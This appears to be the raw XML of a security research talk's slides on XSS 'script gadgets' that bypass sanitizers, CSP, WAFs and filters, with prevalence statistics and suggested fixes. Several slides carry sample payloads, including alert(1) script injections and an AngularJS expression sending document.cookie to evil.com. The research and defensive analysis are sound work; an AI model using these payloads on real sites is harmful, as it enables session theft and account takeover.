            <a:ext cx="706565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data-role=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"popup"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'--&gt;&lt;script&gt;"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use-strict";alert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(1);&lt;/script&gt;'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45544DF-04FE-4A79-A545-A328D215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139" y="5366609"/>
            <a:ext cx="706565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$.html(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1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'--&gt;&lt;script&gt;"use-strict";alert(1);&lt;/script&gt;’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8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DF660-CBB5-4E1F-81F2-7AE9202B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295912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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Whitelist/nonce-based CSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>was the most difficult target.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000" dirty="0"/>
              <a:t>Can’t use gadget which end up in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>()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000" dirty="0"/>
              <a:t>Can’t use gadget which create new script element.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We can still bypass such gadgets with the so called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>expression parsers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.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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alibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note: these gadget was successful in bypassing all mitigations.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DF660-CBB5-4E1F-81F2-7AE9202B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295912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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Whitelist/nonce-based CSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>was the most difficult target.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000" dirty="0"/>
              <a:t>Can’t use gadget which end up in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>()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n-US" sz="2000" dirty="0"/>
              <a:t>Can’t use gadget which create new script element.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We can still bypass such gadgets with the so called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>expression parsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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alibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note: these gadget was successful in bypassing all mitigations.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1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DF660-CBB5-4E1F-81F2-7AE9202B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50" y="1295912"/>
            <a:ext cx="10515600" cy="43938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Example: a cookie stealer in AngualrJS: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alibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>No JavaScript is required.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="24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5D0233-C9DD-4D90-A268-765D42DD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316" y="2471140"/>
            <a:ext cx="864255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"https://www.evil.com?cookie={{$global.document.cookie}}"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Bypassing CSP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2879B-6C07-4DCF-BC7B-64ED6CBE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80" y="1714500"/>
            <a:ext cx="9010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4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4B0E2-1E7A-457B-B4CD-0CF44B002BBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2679840" y="3136612"/>
            <a:ext cx="6908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Script Gadgets in Real-world Apps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417830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8FFE-7696-45F0-8811-38AE1E19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11" y="1502599"/>
            <a:ext cx="10515600" cy="3269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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How common are gadgets in real world applications?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:latin typeface="Calibri (Body)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600" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Investigating gadgets in real world?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Finding Gadgets at Scale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267A0-B7CA-40B7-B989-7F9641D0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0" y="3074201"/>
            <a:ext cx="5572125" cy="21621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F5F8860-AA65-431F-BAD7-74FDE908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550" y="1888810"/>
            <a:ext cx="391115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#button[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"data-text"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-&gt; elem.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48945-A13B-4E8B-9014-F16B7A2EAD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92905" y="2027310"/>
            <a:ext cx="1346645" cy="14016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0A4EEB3C-B680-49EE-A461-2F5EEF0B7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5342" y="3009604"/>
            <a:ext cx="1204469" cy="12044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5B024-AA61-4D10-81D1-9A8078B56C74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9395128" y="2165809"/>
            <a:ext cx="2449" cy="8437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3152FD7C-5A41-4D61-99BC-C54CF401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869" y="4545150"/>
            <a:ext cx="290051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65E111-25C8-4569-ACD6-A2F63E7F583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9395127" y="4214073"/>
            <a:ext cx="2450" cy="3310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D974A001-3B2E-4FED-A773-4AE68256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348" y="5896916"/>
            <a:ext cx="609290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data-text=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onload=verify()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65364-3345-44AC-9864-919DF56514FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9100177" y="4839922"/>
            <a:ext cx="294949" cy="10223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Arrow: Clockwise curve">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5898B71E-A3D0-4AE3-B324-8EFA9B839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461" y="535486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28C39E-E0B3-41D9-A0F5-1B6C1B29B214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346365" y="1325788"/>
            <a:ext cx="24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Taint Tracking Engine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E0444BCF-027C-477B-9B03-3C7E81BA5E87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6719334" y="3280212"/>
            <a:ext cx="1958026" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 62524"/>
              <a:gd name="adj2" fmla="val -11324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Exploit Generator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 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1FA5523-BCF3-49A7-A0DB-AC245C1FC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57" y="1848875"/>
            <a:ext cx="2002348" cy="633867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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77668E0E-75CE-479E-B81D-F9264AF612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6132" y="1708608"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Arrow: Left 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C0301C0-1D6F-45D1-8814-579B04023E45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2702930" y="2112494"/>
            <a:ext cx="1393202" cy="133254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4E2E9AD-4F27-4A69-826B-ECFF46585EF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492129" y="2623008"/>
            <a:ext cx="122405" cy="38659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84DA8-2809-49B8-9CB2-CF214A8937C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="841295" y="2034345"/>
            <a:ext cx="10593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400" dirty="0"/>
              <a:t>  Security Analysis of Mitigations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400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Based on tainted data flows present on 82% of all sites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  Two mitigation strategies caught the area of interests:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2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HTML Sanitizers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2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Content 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4156569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HTML Sanitizers at Scale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84DA8-2809-49B8-9CB2-CF214A8937C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="841295" y="2034345"/>
            <a:ext cx="10593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How Secure are HTML sanitizers in default settings?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Sanitizers don’t sanitize certain well-known attributes (id, class, etc.)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  Some sanitizers even allow data-attributes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Results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400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>78 % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of all domains had at least one data flow from an HTML attribute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>60 % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of the sites exhibited data flows from data- attributes.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b="1" dirty="0"/>
              <a:t>  16 % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>data flows from id attributes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b="1" dirty="0"/>
              <a:t>  10 % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from class attributes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr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71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4B0E2-1E7A-457B-B4CD-0CF44B002BBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3781905" y="313661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XSS &amp; XSS Mitigations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182999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Content Security Policy at Scale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84DA8-2809-49B8-9CB2-CF214A8937C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="841295" y="2034345"/>
            <a:ext cx="10593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dirty="0"/>
              <a:t>How (in)secure are different CSP keywords?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CSP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unsafe-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unsafe-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/>
              <a:t> is considered secure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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>48 % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>of all domains have a potential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> gadget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CSP strict-dynamic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dirty="0"/>
              <a:t>Flows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jQuery.html()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000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(tainted).text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en-US" sz="2000" b="1" dirty="0"/>
              <a:t>73 % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>of all domains have a potential strict-dynamic gadget.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400" b="1" dirty="0"/>
              <a:t>Data shows strict-dynamic and unsafe-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> considerably weaken a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8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4B0E2-1E7A-457B-B4CD-0CF44B002BBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3691335" y="3136612"/>
            <a:ext cx="4809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209906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Outlook &amp; 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84DA8-2809-49B8-9CB2-CF214A8937C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533805" y="1284607"/>
            <a:ext cx="110538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2000" b="1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400" dirty="0"/>
              <a:t>Current XSS Mitigations are not well aligned with modern JS libraries/frameworks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 Any solutions? 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Having current mitigations to be Gadgets-aware.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Fix the libraries themselves.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Develop better isolation primitives.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39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F1A6-92C6-49FD-BEE1-E0C7CCA9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585764"/>
            <a:ext cx="105939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A8F61-D15C-4727-A23D-7E666B49BF2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98FE24-AB4E-4D1F-BC3C-7C10094919F0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F0798-FBD2-49FA-893F-D190505B5DE8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6C007E-FCED-46EC-B082-D984164C3ACC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F50B00-DDF8-4D78-9C78-71823402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668000" cy="8330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84DA8-2809-49B8-9CB2-CF214A8937C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533806" y="1284607"/>
            <a:ext cx="1059396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2000" b="1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400" dirty="0"/>
              <a:t>XSS Mitigations work by blocking the attack and prevents it from happening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Gadgets can be used to bypass mitigations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Gadgets exist in most modern JS libraries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Gadgets are also prevalent in user land code of many websites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6008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5B59-5CB5-4722-8864-781C5884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Thank you for your attention! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36020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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02A26ECC-20C1-4091-BCB4-C4064F08D586}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6921927" y="1921401"/>
            <a:ext cx="4866616" cy="221095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Cross-site scripting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22FE0-3657-4A28-AC62-51206D9E9DDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7217896" y="2706924"/>
            <a:ext cx="436707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altLang="en-US" sz="16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US" altLang="en-US" sz="16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US" altLang="en-US" sz="16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en-US" sz="16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altLang="en-US" sz="16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altLang="en-US" sz="16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42EA37-C90A-4EBE-B447-7B205A162B29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882899" y="2351394"/>
            <a:ext cx="2054124" cy="6754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D6FFC6-4A4B-4A23-BC4A-F8460ACFEA4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="541705" y="1462912"/>
            <a:ext cx="5923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https://www.example.com/greeting.php?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&lt;script&gt;alert(1);&lt;/script&gt;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9266F5-5495-4E00-A100-2A96D4DF149E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4869841" y="3026878"/>
            <a:ext cx="2067182" cy="90576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7C3FCD-94DD-477A-90DC-2BF2125A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2035044"/>
            <a:ext cx="4599841" cy="379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30112-A9E5-4E1E-971F-259C762C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2" y="4518199"/>
            <a:ext cx="4095750" cy="11715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B7A81DC-47CD-46BC-BC2F-0842965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66" y="3837129"/>
            <a:ext cx="326092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9" grpId="0" animBg="1"/>
      <p:bldP spid="2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A7-63F9-4CE0-9E62-B020D32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6" y="264510"/>
            <a:ext cx="10515600" cy="833054"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS mitigations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CDD7-A0FB-4E1E-B07F-0E9E787876FE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1CB59-8A5E-4527-A348-3919F87AAFE1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8AE28-BF2B-4798-89F5-0025A59533A1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05850045-577B-4ED4-9A5B-7784F252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11" y="1385244"/>
            <a:ext cx="584485" cy="584485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E83BDE-7B1C-4503-A87D-5D991411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70" y="1717205"/>
            <a:ext cx="4599841" cy="379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8BC45-8FD6-4941-B822-B8CACFD4B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070" y="1539166"/>
            <a:ext cx="1059426" cy="1059426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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6A86BF2F-67BA-4853-A301-4B951E017225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229601" y="2622755"/>
            <a:ext cx="3754166" cy="161249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B0FDD-60B0-46E8-AA07-ED436FD89714}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1022554" y="1885955"/>
            <a:ext cx="2874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example.com/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greeting.php?name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=&lt;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xss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xss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5281CE-F3FA-4F79-8F01-CA386E8C1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741" y="1459703"/>
            <a:ext cx="2148832" cy="6845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6C6261-66B2-4219-B571-F33D91AD8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176" y="1822224"/>
            <a:ext cx="1059426" cy="10594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BF2435-C7FD-4515-88E9-F84D6BEA2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37" y="3111953"/>
            <a:ext cx="1125645" cy="8442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FC8F69-D781-4605-BF73-748899F95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645" y="3302959"/>
            <a:ext cx="12192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C902D9-CE1B-42FE-8074-7444D555D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54" y="3426474"/>
            <a:ext cx="1059426" cy="1059426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7300D154-897F-4554-8B18-BB280E6B902A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5220929" y="2752513"/>
            <a:ext cx="3092776" cy="2285043"/>
          </a:xfrm>
          <a:prstGeom prst="curvedLeftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 12847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3AF75-9DC2-4FDE-B814-6FDD8CCEB121}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8656094" y="3168319"/>
            <a:ext cx="2901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err="1"/>
              <a:t>greeting.php?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>=&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>xss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3BC40-C8DA-4A47-93CF-678B1C5685B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3026143" y="3356346"/>
            <a:ext cx="104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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss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8A35D7-C6CE-4D2B-8788-0AF533F99FAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2083721" y="4929567"/>
            <a:ext cx="1813338" cy="45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Sanitizers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BFEF31-DA16-4D65-8BD7-0453CCC1E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320" y="4874039"/>
            <a:ext cx="1059426" cy="10594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B406AF-41A3-47F6-BAA8-6EF3C0570E1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6009514" y="5390436"/>
            <a:ext cx="2506375" cy="45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Security Policy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6073F5-639F-4E6E-A763-16DCFB7E6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253" y="5208753"/>
            <a:ext cx="1059426" cy="10594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71441F-B817-4B35-92CF-C142B21221AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2248082" y="2144234"/>
            <a:ext cx="1104718" cy="102408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408B84-98FF-41CA-A3BA-663B60FF51A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2294246" y="3614800"/>
            <a:ext cx="802410" cy="1057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EAD831-E682-4207-B0C0-BE549B346F7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897059" y="2016760"/>
            <a:ext cx="581386" cy="381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68B32C-2288-4B44-A814-F9B5D281FDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9634698" y="2230412"/>
            <a:ext cx="1131625" cy="101646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F0336D-BCA0-4B6B-B55D-45EF65867E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951595" y="3879566"/>
            <a:ext cx="599468" cy="92148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B337652-7F79-4823-BA48-64D9AE8717D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10219635" y="1972520"/>
            <a:ext cx="865327" cy="45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WAFs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1943A7-5DB9-446A-BD64-2A65A09C4817}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2846640" y="2734658"/>
            <a:ext cx="1185238" cy="45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XSS Filters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9052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4" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="32" grpId="0" animBg="1"/>
      <p:bldP spid="33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5C82E-E99C-4F98-B777-BC653BE2A3DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480875" y="2283889"/>
            <a:ext cx="72302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Mitigations assume that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>blocking dangerous tags &amp; attributes stops XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Is this true when building an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>with a modern JS frameworks?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2941CF-3527-4AB7-8A54-1B16DF90E34E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91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4B0E2-1E7A-457B-B4CD-0CF44B002BBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4546537" y="313661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Script Gadgets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6976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269-87A5-491F-818F-5F43DFD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703D5-C2AE-4177-ACAE-A38A604DB1FF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44E200-33E0-40FD-A95E-456CA35386E9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71124-2B44-49D7-80CF-AE323DD078A0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Modern Web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7B49D-BF0B-4F2C-B354-2F7ADB2E0712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E0E3B-7E45-4324-9658-F4BA0B25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92" y="1980505"/>
            <a:ext cx="9068438" cy="3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8269-87A5-491F-818F-5F43DFD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600E-CAD3-4127-A83B-A840BF79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Script Gadget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legitimate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> JS code in the application that can be triggered via an HTML injection.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80C2A-6567-441A-965C-69B03F95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881313"/>
            <a:ext cx="8743950" cy="3295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D703D5-C2AE-4177-ACAE-A38A604DB1FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
